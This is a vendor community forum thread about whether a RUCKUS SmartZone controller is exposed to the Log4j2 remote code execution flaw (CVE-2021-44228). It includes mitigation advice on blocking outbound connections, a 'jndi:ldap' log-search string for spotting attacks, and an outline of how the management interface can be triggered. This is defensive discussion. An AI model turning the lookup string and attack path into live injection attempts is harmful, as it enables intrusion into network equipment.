This website uses cookies. By clicking Accept, you consent to the use of cookies. Click Here to learn more about how we use cookies.
Accept
Reject
RUCKUS Self Help |   ASK the Pack
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee
New Contributor II

‎12-12-2021 05:51 PM

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.


The customer asked if the SmartZone has the following this security vulnerabilities.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

91 REPLIES 91

diego_garcia_de
Contributor III
In response to grodog-prod

‎12-14-2021 10:05 AM

thanks @allan_grohe Thats good to know. Especially for this forum where everyone can read about it.

diego_garcia_de
Contributor III

‎12-14-2021 05:45 AM

Hello everyone concerned,

We've seen some recommendations to block outgoing connections from smartzone as a possible mitigation / protection (since the blocked outgoing connection would prevent the malicious ldap download from occurring). 

Keep in mind that a port other than the standard LDAP could be included in the exploit URL so its not enough to just block outgoing LDAP traffic.

Is there any way that ruckus can provide a list of "expected" IPs that the smartzone would connect to in normal operation?

Of course, any proxied radius connections, ftp server for logging or backup, etc would be entirely up to me, the administrator, to add.

But I have now added a block-and-log rule and I'm seeing outgoing connections to akamai from smartzone, in particular to IPs 23.205.105.175 and 23.205.105.155

bjarne_goldau
New Contributor

‎12-15-2021 12:31 AM

I just want to add, that you can check if there were attacks by searching the "web-critical" log for "jndi:ldap".
Does anybody know if the control interface is vulnerable too?

0 Kudos

Vineet_nejwala
Moderator
Moderator
In response to bjarne_goldau

‎12-15-2021 03:19 AM

@bjarne_goldau

Management interface would be the most likely vulnerable since a user can input a specific string from UI/Public API to trigger this vulnerability but IMHO any way that an attacker can input a specific string into logger directly or indirectly via any interface will affect SZ .  On the fix (ksp patch) we are currently completing testing cycle to make sure there is no regression and once completed it would be out.

Best Regards

Vineet

0 Kudos

bjarne_goldau
New Contributor
In response to bjarne_goldau

‎12-15-2021 03:30 AM

Hi Vineet, Management interface is vulnerable, i tried that myself. I am asking about the control interface where the accesspoint connect to. Do you have any information on that?

Copyright © 2024 Khoros, LLC